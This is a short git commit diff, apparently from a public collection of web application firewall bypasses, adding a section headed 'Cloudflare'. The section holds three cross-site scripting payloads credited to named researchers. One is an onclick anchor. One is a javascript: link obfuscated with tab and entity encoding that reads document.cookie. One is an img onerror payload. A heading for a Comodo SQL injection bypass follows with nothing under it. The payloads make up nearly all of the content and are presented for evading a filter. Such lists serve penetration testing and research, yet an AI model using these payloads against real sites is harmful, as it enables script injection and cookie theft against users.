Added a bypass for Cloudflare

This commit is contained in:
0xInfection 2019-02-28 13:40:45 +05:30 committed by root
parent e7b9fd4f40
commit 950e42eb3e

View File

@ -1879,14 +1879,14 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
```
### Cloudflare
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v)
```
<a"/onclick=(confirm)()>ClickHere
```
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
```
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
```
- XSS Bypass by [@Ahmet Ümit](https://twitter.com/ahmetumitbayram)
```
<--`<img/src=` onerror=confirm``> --!>
```
### Comodo
- SQLi by [@WAFNinja](https://waf.ninja)